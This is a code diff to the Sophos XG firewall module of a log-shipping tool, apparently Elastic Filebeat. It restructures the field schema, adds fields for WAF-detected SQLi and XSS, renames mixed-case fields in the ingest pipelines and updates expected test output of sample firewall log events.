--- a/x-pack/filebeat/module/sophos/xg/_meta/fields.yml +++ b/x-pack/filebeat/module/sophos/xg/_meta/fields.yml @@ -1,940 +1,946 @@ -- name: sophos +- name: sophos.xg type: group + release: beta + default_field: false description: > + Module for parsing sophosxg syslog. fields: - - name: xg - type: group - release: beta - default_field: false - description: > - Module for parsing sophosxg syslog. - fields: - - name: device - type: keyword - description: > - device - - - name: date - type: date - description: > - Date (yyyy-mm-dd) when the event occurred - - - name: timezone - type: keyword - description: > - Time (hh:mm:ss) when the event occurred - - - name: device_name - type: keyword - description: > - Model number of the device - - - name: device_id - type: keyword - description: > - Serial number of the device - - - name: log_id - type: keyword - description: > - Unique 12 characters code (0101011) - - - name: log_type - type: keyword - description: > - Type of event e.g. firewall event - - - name: log_component - type: keyword - description: > - Component responsible for logging e.g. Firewall rule - - - name: log_subtype - type: keyword - description: > - Sub type of event - - - name: hb_health - type: keyword - description: > - Heartbeat status - - - name: priority - type: keyword - description: > - Severity level of traffic - - - name: status - type: keyword - description: > - Ultimate status of traffic – Allowed or Denied - - - name: duration - type: long - description: > - Durability of traffic (seconds) - - - name: fw_rule_id - type: integer - description: > - Firewall Rule ID which is applied on the traffic - - - name: user_name - type: keyword - description: > - user_name - - - name: user_group - type: keyword - description: > - Group name to which the user belongs - - - name: iap - type: keyword - description: > - Internet Access policy ID applied on the traffic - - - name: ips_policy_id - type: integer - description: > - IPS policy ID applied on the traffic - - - name: policy_type - type: keyword - description: > - Policy type applied to the traffic - - - name: appfilter_policy_id - type: integer - description: > - Application Filter policy applied on the traffic - - - name: application_filter_policy - type: integer - description: > - Application Filter policy applied on the traffic - - - name: application - type: keyword - description: > - Application name - - - name: application_name - type: keyword - description: > - Application name - - - name: application_risk - type: keyword - description: > - Risk level assigned to the application - - - name: application_technology - type: keyword - description: > - Technology of the application - - - name: application_category - type: keyword - description: > - Application is resolved by signature or synchronized application - - - name: appresolvedby - type: keyword - description: > - Technology of the application - - - name: app_is_cloud - type: keyword - description: > - Application is Cloud - - - name: in_interface - type: keyword - description: > - Interface for incoming traffic, e.g., Port A - - - name: out_interface - type: keyword - description: > - Interface for outgoing traffic, e.g., Port B - - - name: src_ip - type: ip - description: > - Original source IP address of traffic - - - name: src_mac - type: keyword - description: > - Original source MAC address of traffic - - - name: src_country_code - type: keyword - description: > - Code of the country to which the source IP belongs - - - name: dst_ip - type: ip - description: > - Original destination IP address of traffic - - - name: dst_country_code - type: keyword - description: > - Code of the country to which the destination IP belongs - - - name: protocol - type: keyword - description: > - Protocol number of traffic - - - name: src_port - type: integer - description: > - Original source port of TCP and UDP traffic - - - name: dst_port - type: integer - description: > - Original destination port of TCP and UDP traffic - - - name: icmp_type - type: keyword - description: > - ICMP type of ICMP traffic - - - name: icmp_code - type: keyword - description: > - ICMP code of ICMP traffic - - - name: sent_pkts - type: long - description: > - Total number of packets sent - - - name: received_pkts - type: long - description: > - Total number of packets received - - - name: sent_bytes - type: long - description: > - Total number of bytes sent - - - name: recv_bytes - type: long - description: > - Total number of bytes received - - - name: trans_src_ ip - type: ip - description: > - Translated source IP address for outgoing traffic - - - name: trans_src_port - type: integer - description: > - Translated source port for outgoing traffic - - - name: trans_dst_ip - type: ip - description: > - Translated destination IP address for outgoing traffic - - - name: trans_dst_port - type: integer - description: > - Translated destination port for outgoing traffic - - - name: srczonetype - type: keyword - description: > - Type of source zone, e.g., LAN - - - name: srczone - type: keyword - description: > - Name of source zone - - - name: dstzonetype - type: keyword - description: > - Type of destination zone, e.g., WAN - - - name: dstzone - type: keyword - description: > - Name of destination zone - - - name: dir_disp - type: keyword - description: > - TPacket direction. Possible values:“org”, “reply”, “” - - - name: connevent - type: keyword - description: > - Event on which this log is generated - - - name: conn_id - type: integer - description: > - Unique identifier of connection - - - name: vconn_id - type: integer - description: > - Connection ID of the master connection - - - name: idp_policy_id - type: integer - description: > - IPS policy ID which is applied on the traffic - - - name: idp_policy_name - type: keyword - description: > - IPS policy name i.e. IPS policy name which is applied on the traffic - - - name: signature_id - type: keyword - description: > - Signature ID - - - name: signature_msg - type: keyword - description: > - Signature messsage - - - name: classification - type: keyword - description: > - Signature classification - - - name: rule_priority - type: keyword - description: > - Priority of IPS policy - - - name: platform - type: keyword - description: > - Platform of the traffic. - - - name: category - type: keyword - description: > - IPS signature category. - - - name: target - type: keyword - description: > - Platform of the traffic. - - - name: eventid - type: keyword - description: > - ATP Evenet ID - - - name: ep_uuid - type: keyword - description: > - Endpoint UUID - - - name: threatname - type: keyword - description: > - ATP threatname - - - name: sourceip - type: ip - description: > - Original source IP address of traffic - - - name: destinationip - type: ip - description: > - Original destination IP address of traffic - - - name: login_user - type: keyword - description: > - ATP login user - - - name: eventtype - type: keyword - description: > - ATP event type - - - name: execution_path - type: keyword - description: > - ATP execution path - - - name: av_policy_name - type: keyword - description: > - Malware scanning policy name which is applied on the traffic - - - name: from_email_address - type: keyword - description: > - Sender email address - - - name: to_email_address - type: keyword - description: > - Receipeint email address - - - name: subject - type: keyword - description: > - Email subject - - - name: mailsize - type: integer - description: > - mailsize - - - name: virus - type: keyword - description: > - virus name - - - name: FTP_url - type: keyword - description: > - FTP URL from which virus was downloaded - - - name: FTP_direction - type: keyword - description: > - Direction of FTP transfer: Upload or Download - - - name: filesize - type: integer - description: > - Size of the file that contained virus - - - name: filepath - type: keyword - description: > - Path of the file containing virus - - - name: filename - type: keyword - description: > - File name associated with the event - - - name: ftpcommand - type: keyword - description: > - FTP command used when virus was found - - - name: url - type: keyword - description: > - URL from which virus was downloaded - - - name: domainname - type: keyword - description: > - Domain from which virus was downloaded - - - name: quarantine - type: keyword - description: > - Path and filename of the file quarantined - - - name: src_domainname - type: keyword - description: > - Sender domain name - - - name: dst_domainname - type: keyword - description: > - Receiver domain name - - - name: reason - type: keyword - description: > - Reason why the record was detected as spam/malicious - - - name: referer - type: keyword - description: > - Referer - - - name: spamaction - type: keyword - description: > - Spam Action - - - name: mailid - type: keyword - description: > - mailid - - - name: quarantine_reason - type: keyword - description: > - Quarantine reason - - - name: status_code - type: keyword - description: > - Status code - - - name: override_token - type: keyword - description: > - Override token - - - name: con_id - type: integer - description: > - Unique identifier of connection - - - name: override_authorizer - type: keyword - description: > - Override authorizer - - - name: transactionid - type: keyword - description: > - Transaction ID of the AV scan. - - - name: upload_file_type - type: keyword - description: > - Upload file type - - - name: upload_file_name - type: keyword - description: > - Upload file name - - - name: httpresponsecode - type: long - description: > - code of HTTP response - - - name: user_gp - type: keyword - description: > - Group name to which the user belongs. - - - name: category_type - type: keyword - description: > - Type of category under which website falls - - - name: download_file_type - type: keyword - description: > - Download file type - - - name: exceptions - type: keyword - description: > - List of the checks excluded by web exceptions. - - - name: contenttype - type: keyword - description: > - Type of the content - - - name: override_name - type: keyword - description: > - Override name - - - name: activityname - type: keyword - description: > - Web policy activity that matched and caused the policy result. - - - name: download_file_name - type: keyword - description: > - Download file name - - - name: sha1sum - type: keyword - description: > - SHA1 checksum of the item being analyzed - - - name: message_id - type: keyword - description: > - Message ID - - - name: connid - type: keyword - description: > - Connection ID - - - name: message - type: keyword - description: > - Message - - - name: email_subject - type: keyword - description: > - Email Subject - - - name: file_path - type: keyword - description: > - File path - - - name: dstdomain - type: keyword - description: > - Destination Domain - - - name: file_size - type: integer - description: > - File Size - - - name: transaction_id - type: keyword - description: > - Transaction ID - - - name: website - type: keyword - description: > - Website - - - name: file_name - type: keyword - description: > - Filename - - - name: context_prefix - type: keyword - description: > - Content Prefix - - - name: site_category - type: keyword - description: > - Site Category - - - name: context_suffix - type: keyword - description: > - Context Suffix - - - name: dictionary_name - type: keyword - description: > - Dictionary Name - - - name: action - type: keyword - description: > - Event Action - - - name: user - type: keyword - description: > - User - - - name: context_match - type: keyword - description: > - Context Match - - - name: direction - type: keyword - description: > - Direction - - - name: auth_client - type: keyword - description: > - Auth Client - - - name: auth_mechanism - type: keyword - description: > - Auth mechanism - - - name: connectionname - type: keyword - description: > - Connectionname - - - name: remotenetwork - type: keyword - description: > - remotenetwork - - - name: localgateway - type: keyword - description: > - Localgateway - - - name: localnetwork - type: keyword - description: > - Localnetwork - - - name: connectiontype - type: keyword - description: > - Connectiontype - - - name: oldversion - type: keyword - description: > - Oldversion - - - name: newversion - type: keyword - description: > - Newversion - - - name: ipaddress - type: keyword - description: > - Ipaddress - - - name: client_physical_address - type: keyword - description: > - Client physical address - - - name: client_host_name - type: keyword - description: > - Client host name - - - name: raw_data - type: keyword - description: > - Raw data - - - name: Mode - type: keyword - description: > - Mode - - - name: sessionid - type: keyword - description: > - Sessionid - - - name: starttime - type: date - description: > - Starttime - - - name: remote_ip - type: ip - description: > - Remote IP - - - name: timestamp - type: date - description: > - timestamp - - - name: SysLog_SERVER_NAME - type: keyword - description: > - SysLog SERVER NAME - - - name: backup_mode - type: keyword - description: > - Backup mode - - - name: source - type: keyword - description: > - Source - - - name: server - type: keyword - description: > - Server - - - name: host - type: keyword - description: > - Host - - - name: responsetime - type: long - description: > - Responsetime - - - name: cookie - type: keyword - description: > - cookie - - - name: querystring - type: keyword - description: > - querystring - - - name: extra - type: keyword - description: > - extra - - - name: PHPSESSID - type: keyword - description: > - PHPSESSID - - - name: start_time - type: date - description: > - Start time - - - name: eventtime - type: date - description: > - Event time - - - name: red_id - type: keyword - description: > - RED ID - - - name: branch_name - type: keyword - description: > - Branch Name - - - name: updatedip - type: ip - description: > - updatedip - - - name: idle_cpu - type: float - description: > - idle ## - - - name: system_cpu - type: float - description: > - system - - - name: user_cpu - type: float - description: > - system - - - name: used - type: integer - description: > - used - - - name: unit - type: keyword - description: > - unit - - - name: total_memory - type: integer - description: > - Total Memory - - - name: free - type: integer - description: > - free - - - name: transmittederrors - type: keyword - description: > - transmitted errors - - - name: receivederrors - type: keyword - description: > - received errors - - - name: receivedkbits - type: long - description: > - received kbits - - - name: transmittedkbits - type: long - description: > - transmitted kbits - - - name: transmitteddrops - type: long - description: > - transmitted drops - - - name: receiveddrops - type: long - description: > - received drops - - - name: collisions - type: long - description: > - collisions - - - name: interface - type: keyword - description: > - interface - - - name: Configuration - type: float - description: > - Configuration - - - name: Reports - type: float - description: > - Reports - - - name: Signature - type: float - description: > - Signature - - - name: Temp - type: float - description: > - Temp - - - name: users - type: keyword - description: > - users - - - name: ssid - type: keyword - description: > - ssid - - - name: ap - type: keyword - description: > - ap - - - name: clients_conn_ssid - type: keyword - description: > - clients connection ssid + - name: device + type: keyword + description: > + device + + - name: date + type: date + description: > + Date (yyyy-mm-dd) when the event occurred + + - name: timezone + type: keyword + description: > + Time (hh:mm:ss) when the event occurred + + - name: device_name + type: keyword + description: > + Model number of the device + + - name: device_id + type: keyword + description: > + Serial number of the device + + - name: log_id + type: keyword + description: > + Unique 12 characters code (0101011) + + - name: log_type + type: keyword + description: > + Type of event e.g. firewall event + + - name: log_component + type: keyword + description: > + Component responsible for logging e.g. Firewall rule + + - name: log_subtype + type: keyword + description: > + Sub type of event + + - name: hb_health + type: keyword + description: > + Heartbeat status + + - name: priority + type: keyword + description: > + Severity level of traffic + + - name: status + type: keyword + description: > + Ultimate status of traffic – Allowed or Denied + + - name: duration + type: long + description: > + Durability of traffic (seconds) + + - name: fw_rule_id + type: integer + description: > + Firewall Rule ID which is applied on the traffic + + - name: user_name + type: keyword + description: > + user_name + + - name: user_group + type: keyword + description: > + Group name to which the user belongs + + - name: iap + type: keyword + description: > + Internet Access policy ID applied on the traffic + + - name: ips_policy_id + type: integer + description: > + IPS policy ID applied on the traffic + + - name: policy_type + type: keyword + description: > + Policy type applied to the traffic + + - name: appfilter_policy_id + type: integer + description: > + Application Filter policy applied on the traffic + + - name: application_filter_policy + type: integer + description: > + Application Filter policy applied on the traffic + + - name: application + type: keyword + description: > + Application name + + - name: application_name + type: keyword + description: > + Application name + + - name: application_risk + type: keyword + description: > + Risk level assigned to the application + + - name: application_technology + type: keyword + description: > + Technology of the application + + - name: application_category + type: keyword + description: > + Application is resolved by signature or synchronized application + + - name: appresolvedby + type: keyword + description: > + Technology of the application + + - name: app_is_cloud + type: keyword + description: > + Application is Cloud + + - name: in_interface + type: keyword + description: > + Interface for incoming traffic, e.g., Port A + + - name: out_interface + type: keyword + description: > + Interface for outgoing traffic, e.g., Port B + + - name: src_ip + type: ip + description: > + Original source IP address of traffic + + - name: src_mac + type: keyword + description: > + Original source MAC address of traffic + + - name: src_country_code + type: keyword + description: > + Code of the country to which the source IP belongs + + - name: dst_ip + type: ip + description: > + Original destination IP address of traffic + + - name: dst_country_code + type: keyword + description: > + Code of the country to which the destination IP belongs + + - name: protocol + type: keyword + description: > + Protocol number of traffic + + - name: src_port + type: integer + description: > + Original source port of TCP and UDP traffic + + - name: dst_port + type: integer + description: > + Original destination port of TCP and UDP traffic + + - name: icmp_type + type: keyword + description: > + ICMP type of ICMP traffic + + - name: icmp_code + type: keyword + description: > + ICMP code of ICMP traffic + + - name: sent_pkts + type: long + description: > + Total number of packets sent + + - name: received_pkts + type: long + description: > + Total number of packets received + + - name: sent_bytes + type: long + description: > + Total number of bytes sent + + - name: recv_bytes + type: long + description: > + Total number of bytes received + + - name: trans_src_ ip + type: ip + description: > + Translated source IP address for outgoing traffic + + - name: trans_src_port + type: integer + description: > + Translated source port for outgoing traffic + + - name: trans_dst_ip + type: ip + description: > + Translated destination IP address for outgoing traffic + + - name: trans_dst_port + type: integer + description: > + Translated destination port for outgoing traffic + + - name: srczonetype + type: keyword + description: > + Type of source zone, e.g., LAN + + - name: srczone + type: keyword + description: > + Name of source zone + + - name: dstzonetype + type: keyword + description: > + Type of destination zone, e.g., WAN + + - name: dstzone + type: keyword + description: > + Name of destination zone + + - name: dir_disp + type: keyword + description: > + TPacket direction. Possible values:“org”, “reply”, “” + + - name: connevent + type: keyword + description: > + Event on which this log is generated + + - name: conn_id + type: integer + description: > + Unique identifier of connection + + - name: vconn_id + type: integer + description: > + Connection ID of the master connection + + - name: idp_policy_id + type: integer + description: > + IPS policy ID which is applied on the traffic + + - name: idp_policy_name + type: keyword + description: > + IPS policy name i.e. IPS policy name which is applied on the traffic + + - name: signature_id + type: keyword + description: > + Signature ID + + - name: signature_msg + type: keyword + description: > + Signature messsage + + - name: classification + type: keyword + description: > + Signature classification + + - name: rule_priority + type: keyword + description: > + Priority of IPS policy + + - name: platform + type: keyword + description: > + Platform of the traffic. + + - name: category + type: keyword + description: > + IPS signature category. + + - name: target + type: keyword + description: > + Platform of the traffic. + + - name: eventid + type: keyword + description: > + ATP Evenet ID + + - name: ep_uuid + type: keyword + description: > + Endpoint UUID + + - name: threatname + type: keyword + description: > + ATP threatname + + - name: sourceip + type: ip + description: > + Original source IP address of traffic + + - name: destinationip + type: ip + description: > + Original destination IP address of traffic + + - name: login_user + type: keyword + description: > + ATP login user + + - name: eventtype + type: keyword + description: > + ATP event type + + - name: execution_path + type: keyword + description: > + ATP execution path + + - name: av_policy_name + type: keyword + description: > + Malware scanning policy name which is applied on the traffic + + - name: from_email_address + type: keyword + description: > + Sender email address + + - name: to_email_address + type: keyword + description: > + Receipeint email address + + - name: subject + type: keyword + description: > + Email subject + + - name: mailsize + type: integer + description: > + mailsize + + - name: virus + type: keyword + description: > + virus name + + - name: ftp_url + type: keyword + description: > + FTP URL from which virus was downloaded + + - name: ftp_direction + type: keyword + description: > + Direction of FTP transfer: Upload or Download + + - name: filesize + type: integer + description: > + Size of the file that contained virus + + - name: filepath + type: keyword + description: > + Path of the file containing virus + + - name: filename + type: keyword + description: > + File name associated with the event + + - name: ftpcommand + type: keyword + description: > + FTP command used when virus was found + + - name: url + type: keyword + description: > + URL from which virus was downloaded + + - name: domainname + type: keyword + description: > + Domain from which virus was downloaded + + - name: quarantine + type: keyword + description: > + Path and filename of the file quarantined + + - name: src_domainname + type: keyword + description: > + Sender domain name + + - name: dst_domainname + type: keyword + description: > + Receiver domain name + + - name: reason + type: keyword + description: > + Reason why the record was detected as spam/malicious + + - name: referer + type: keyword + description: > + Referer + + - name: spamaction + type: keyword + description: > + Spam Action + + - name: mailid + type: keyword + description: > + mailid + + - name: quarantine_reason + type: keyword + description: > + Quarantine reason + + - name: status_code + type: keyword + description: > + Status code + + - name: override_token + type: keyword + description: > + Override token + + - name: con_id + type: integer + description: > + Unique identifier of connection + + - name: override_authorizer + type: keyword + description: > + Override authorizer + + - name: transactionid + type: keyword + description: > + Transaction ID of the AV scan. + + - name: upload_file_type + type: keyword + description: > + Upload file type + + - name: upload_file_name + type: keyword + description: > + Upload file name + + - name: httpresponsecode + type: long + description: > + code of HTTP response + + - name: user_gp + type: keyword + description: > + Group name to which the user belongs. + + - name: category_type + type: keyword + description: > + Type of category under which website falls + + - name: download_file_type + type: keyword + description: > + Download file type + + - name: exceptions + type: keyword + description: > + List of the checks excluded by web exceptions. + + - name: contenttype + type: keyword + description: > + Type of the content + + - name: override_name + type: keyword + description: > + Override name + + - name: activityname + type: keyword + description: > + Web policy activity that matched and caused the policy result. + + - name: download_file_name + type: keyword + description: > + Download file name + + - name: sha1sum + type: keyword + description: > + SHA1 checksum of the item being analyzed + + - name: message_id + type: keyword + description: > + Message ID + + - name: connid + type: keyword + description: > + Connection ID + + - name: message + type: keyword + description: > + Message + + - name: email_subject + type: keyword + description: > + Email Subject + + - name: file_path + type: keyword + description: > + File path + + - name: dstdomain + type: keyword + description: > + Destination Domain + + - name: file_size + type: integer + description: > + File Size + + - name: transaction_id + type: keyword + description: > + Transaction ID + + - name: website + type: keyword + description: > + Website + + - name: file_name + type: keyword + description: > + Filename + + - name: context_prefix + type: keyword + description: > + Content Prefix + + - name: site_category + type: keyword + description: > + Site Category + + - name: context_suffix + type: keyword + description: > + Context Suffix + + - name: dictionary_name + type: keyword + description: > + Dictionary Name + + - name: action + type: keyword + description: > + Event Action + + - name: user + type: keyword + description: > + User + + - name: context_match + type: keyword + description: > + Context Match + + - name: direction + type: keyword + description: > + Direction + + - name: auth_client + type: keyword + description: > + Auth Client + + - name: auth_mechanism + type: keyword + description: > + Auth mechanism + + - name: connectionname + type: keyword + description: > + Connectionname + + - name: remotenetwork + type: keyword + description: > + remotenetwork + + - name: localgateway + type: keyword + description: > + Localgateway + + - name: localnetwork + type: keyword + description: > + Localnetwork + + - name: connectiontype + type: keyword + description: > + Connectiontype + + - name: oldversion + type: keyword + description: > + Oldversion + + - name: newversion + type: keyword + description: > + Newversion + + - name: ipaddress + type: keyword + description: > + Ipaddress + + - name: client_physical_address + type: keyword + description: > + Client physical address + + - name: client_host_name + type: keyword + description: > + Client host name + + - name: raw_data + type: keyword + description: > + Raw data + + - name: Mode + type: keyword + description: > + Mode + + - name: sessionid + type: keyword + description: > + Sessionid + + - name: starttime + type: date + description: > + Starttime + + - name: remote_ip + type: ip + description: > + Remote IP + + - name: timestamp + type: date + description: > + timestamp + + - name: SysLog_SERVER_NAME + type: keyword + description: > + SysLog SERVER NAME + + - name: backup_mode + type: keyword + description: > + Backup mode + + - name: source + type: keyword + description: > + Source + + - name: server + type: keyword + description: > + Server + + - name: host + type: keyword + description: > + Host + + - name: responsetime + type: long + description: > + Responsetime + + - name: cookie + type: keyword + description: > + cookie + + - name: querystring + type: keyword + description: > + querystring + + - name: extra + type: keyword + description: > + extra + + - name: PHPSESSID + type: keyword + description: > + PHPSESSID + + - name: start_time + type: date + description: > + Start time + + - name: eventtime + type: date + description: > + Event time + + - name: red_id + type: keyword + description: > + RED ID + + - name: branch_name + type: keyword + description: > + Branch Name + + - name: updatedip + type: ip + description: > + updatedip + + - name: idle_cpu + type: float + description: > + idle ## + + - name: system_cpu + type: float + description: > + system + + - name: user_cpu + type: float + description: > + system + + - name: used + type: integer + description: > + used + + - name: unit + type: keyword + description: > + unit + + - name: total_memory + type: integer + description: > + Total Memory + + - name: free + type: integer + description: > + free + + - name: transmittederrors + type: keyword + description: > + transmitted errors + + - name: receivederrors + type: keyword + description: > + received errors + + - name: receivedkbits + type: long + description: > + received kbits + + - name: transmittedkbits + type: long + description: > + transmitted kbits + + - name: transmitteddrops + type: long + description: > + transmitted drops + + - name: receiveddrops + type: long + description: > + received drops + + - name: collisions + type: long + description: > + collisions + + - name: interface + type: keyword + description: > + interface + + - name: Configuration + type: float + description: > + Configuration + + - name: Reports + type: float + description: > + Reports + + - name: Signature + type: float + description: > + Signature + + - name: Temp + type: float + description: > + Temp + + - name: users + type: keyword + description: > + users + + - name: ssid + type: keyword + description: > + ssid + + - name: ap + type: keyword + description: > + ap + + - name: clients_conn_ssid + type: keyword + description: > + clients connection ssid + + - name: sqli + type: keyword + description: > + The related SQLI caught by the WAF + + - name: xss + type: keyword + description: > + The related XSS caught by the WAF diff --git a/x-pack/filebeat/module/sophos/xg/config/config.yml b/x-pack/filebeat/module/sophos/xg/config/config.yml index 676d19f05d3..9c21c73ddf9 100644 --- a/x-pack/filebeat/module/sophos/xg/config/config.yml +++ b/x-pack/filebeat/module/sophos/xg/config/config.yml @@ -27,7 +27,7 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.8.0 + ecs.version: 1.9.0 - add_fields: target: '_conf' fields: diff --git a/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml b/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml index a5c0b7c32cd..845a93c945e 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/antivirus.yml @@ -333,6 +333,14 @@ processors: - lowercase: field: event.info ignore_failure: true +- rename: + field: sophos.xg.FTP_direction + target_field: sophos.xg.ftp_direction + ignore_missing: true +- rename: + field: sophos.xg.FTP_url + target_field: sophos.xg.ftp_url + ignore_missing: true - remove: field: - sophos.xg.dst_port diff --git a/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml b/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml index ef8599270e0..76144a06cff 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/pipeline.yml @@ -17,7 +17,7 @@ processors: # split Sophos-XG fields - kv: field: log.original - field_split: " (?=[a-z0-9\\_\\-]+=)" + field_split: " (?=[a-zA-Z0-9\\_\\-]+=)" value_split: "=" prefix: "sophos.xg." ignore_missing: true @@ -29,7 +29,7 @@ processors: field: _temp_.time value: "{{sophos.xg.date}} {{sophos.xg.time}}" - date: - if: "ctx.event.timezone == null" + if: "ctx?.event?.timezone == null" field: _temp_.time target_field: "@timestamp" formats: @@ -38,7 +38,7 @@ processors: - yyyy-MM-dd HH:mm:ss z - ISO8601 - date: - if: "ctx.event.timezone != null" + if: "ctx?.event?.timezone != null" timezone: "{{ event.timezone }}" field: _temp_.time target_field: "@timestamp" @@ -48,6 +48,26 @@ processors: - yyyy-MM-dd HH:mm:ss z - ISO8601 +- date: + if: "ctx?.event.timezone == null && ctx?.sophos?.xg?.eventtime != null" + field: sophos.xg.eventtime + target_field: sophos.xg.eventtime + formats: + - yyyy-MM-dd HH:mm:ss + - yyyy-MM-dd HH:mm:ss Z + - yyyy-MM-dd HH:mm:ss z + - ISO8601 +- date: + if: "ctx.event.timezone != null && ctx?.sophos?.xg?.eventtime != null" + timezone: "{{ event.timezone }}" + field: sophos.xg.eventtime + target_field: sophos.xg.eventtime + formats: + - yyyy-MM-dd HH:mm:ss + - yyyy-MM-dd HH:mm:ss Z + - yyyy-MM-dd HH:mm:ss z + - ISO8601 + # Sets starts, end and duration when start and duration is known - script: lang: painless diff --git a/x-pack/filebeat/module/sophos/xg/ingest/waf.yml b/x-pack/filebeat/module/sophos/xg/ingest/waf.yml index 8e58395a3bf..e0ea89c41dc 100644 --- a/x-pack/filebeat/module/sophos/xg/ingest/waf.yml +++ b/x-pack/filebeat/module/sophos/xg/ingest/waf.yml @@ -266,6 +266,14 @@ processors: ############# ## Cleanup ## ############# +- rename: + field: sophos.xg.SQLi + target_field: sophos.xg.sqli + ignore_missing: true +- rename: + field: sophos.xg.XSS + target_field: sophos.xg.xss + ignore_missing: true - remove: field: - sophos.xg.bytesrcv diff --git a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json index 65b2d6abdfd..4afefcee9b4 100644 --- a/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/anti-virus.log-expected.json @@ -542,6 +542,8 @@ "sophos.xg.device": "SFW", "sophos.xg.device_name": "SF01V", "sophos.xg.dst_country_code": "R1", + "sophos.xg.ftp_direction": "Upload", + "sophos.xg.ftp_url": "/var/www//home/ftp-user/ta_test_file_1ta-cl1-46", "sophos.xg.ftpcommand": "STOR", "sophos.xg.log_component": "FTP", "sophos.xg.log_subtype": "Virus", @@ -549,7 +551,7 @@ "sophos.xg.message_id": "09001", "sophos.xg.priority": "Critical", "sophos.xg.src_country_code": "R1", - "sophos.xg.virus": "EICAR-AV-Test\" FTP_url=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" FTP_direction=\"Upload", + "sophos.xg.virus": "EICAR-AV-Test", "source.bytes": 0, "source.ip": "10.146.13.49", "source.port": 39910, @@ -609,13 +611,14 @@ "service.type": "sophos", "sophos.xg.device": "SFW", "sophos.xg.device_name": "SF01V", + "sophos.xg.ftp_direction": "Download", + "sophos.xg.ftp_url": "/var/www//home/ftp-user/ta_test_file_1ta-cl1-46", "sophos.xg.ftpcommand": "RETR", "sophos.xg.log_component": "FTP", "sophos.xg.log_subtype": "Allowed", "sophos.xg.log_type": "Anti-Virus", "sophos.xg.message_id": "09002", "sophos.xg.priority": "Information", - "sophos.xg.virus": " FTP_url=\"/var/www//home/ftp-user/ta_test_file_1ta-cl1-46\" FTP_direction=\"Download", "source.bytes": 0, "source.ip": "10.146.13.49", "source.port": 39936, diff --git a/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json b/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json index a237d2d2a36..f08587eaa91 100644 --- a/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json +++ b/x-pack/filebeat/module/sophos/xg/test/event.log-expected.json @@ -404,6 +404,7 @@ ], "server.bytes": 0, "service.type": "sophos", + "sophos.xg.Mode": "Remote Access", "sophos.xg.device": "SFW", "sophos.xg.device_name": "XG230", "sophos.xg.ipaddress": "10.82.234.5", @@ -411,7 +412,7 @@ "sophos.xg.log_subtype": "System", "sophos.xg.log_type": "Event", "sophos.xg.message_id": "17824", - "sophos.xg.priority": "Information Mode=\"Remote Access", + "sophos.xg.priority": "Information", "sophos.xg.remote_ip": "10.82.234.12", "sophos.xg.starttime": "0", "sophos.xg.status": "Established", @@ -523,6 +524,52 @@ "forwarded" ] }, + { + "@timestamp": "2020-05-18T14:39:07.000-02:00", + "client.ip": "10.83.234.5", + "event.code": "062009617502", + "event.dataset": "sophos.xg", + "event.kind": "event", + "event.module": "sophos", + "event.original": "device=\"SFW\" date=2020-05-18 time=14:39:07 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=062009617502 log_type=\"Event\" log_component=\"GUI\" log_subtype=\"Admin\" status=\"Successful\" priority=Information user_name=\"admin\" src_ip=10.83.234.5 SysLog_SERVER_NAME='Logstash' message=\"SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'\"", + "event.severity": "6", + "event.timezone": "-02:00", + "fileset.name": "xg", + "host.name": "some_other_host.local", + "input.type": "log", + "log.level": "informational", + "log.offset": 4674, + "message": "SysLog Server 'Logstash' settings were changed by 'admin' from '10.83.234.5' using 'GUI'", + "observer.product": "XG", + "observer.serial_number": "1234567890123457", + "observer.type": "firewall", + "observer.vendor": "Sophos", + "related.hosts": [ + "some_other_host.local" + ], + "related.ip": [ + "10.83.234.5" + ], + "related.user": [ + "admin" + ], + "service.type": "sophos", + "sophos.xg.SysLog_SERVER_NAME": "'Logstash'", + "sophos.xg.device": "SFW", + "sophos.xg.device_name": "XG230", + "sophos.xg.log_component": "GUI", + "sophos.xg.log_subtype": "Admin", + "sophos.xg.log_type": "Event", + "sophos.xg.message_id": "17502", + "sophos.xg.priority": "Information", + "sophos.xg.status": "Successful", + "source.ip": "10.83.234.5", + "source.user.name": "admin", + "tags": [ + "sophos-xg", + "forwarded" + ] + }, { "@timestamp": "2020-05-18T14:39:08.000-02:00", "client.ip": "172.66.35.15", @@ -712,6 +759,144 @@ ], "user.name": "elastic.user@elastic.test.com" }, + { + "@timestamp": "2017-03-16T12:56:01.000-02:00", + "client.bytes": 0, + "destination.bytes": 0, + "event.code": "066811618014", + "event.dataset": "sophos.xg", + "event.duration": 164000000000000, + "event.end": "2017-03-18T10:29:21.000-02:00", + "event.kind": "event", + "event.module": "sophos", + "event.original": "device=\"SFW\" date=2017-03-16 time=12:56:01 timezone=\"IST\" device_name=\"XG125w\" device_id=S1601E1F9FCB7EE log_id=066811618014 log_type=\"Event\" log_component=\"RED\" log_subtype=\"System\" priority=Information red_id=A350196C47072B0 status=\"Connected\" eventtime=\"2017-03-16 12:56:01 IST\" duration=164000 branch_name=Gaurav Patel recv_bytes=0 sent_bytes=0 message=\"A350196C47072B0/Gaurav Patel is now re-connected after 164000 ms\"", + "event.severity": "6", + "event.start": "2017-03-16T12:56:01.000-02:00", + "event.timezone": "-02:00", + "fileset.name": "xg", + "host.name": "firewall.localgroup.local", + "input.type": "log", + "log.level": "informational", + "log.offset": 6643, + "message": "A350196C47072B0/Gaurav Patel is now re-connected after 164000 ms", + "observer.product": "XG", + "observer.serial_number": "S1601E1F9FCB7EE", + "observer.type": "firewall", + "observer.vendor": "Sophos", + "related.hosts": [ + "firewall.localgroup.local" + ], + "server.bytes": 0, + "service.type": "sophos", + "sophos.xg.branch_name": "Gaurav Patel", + 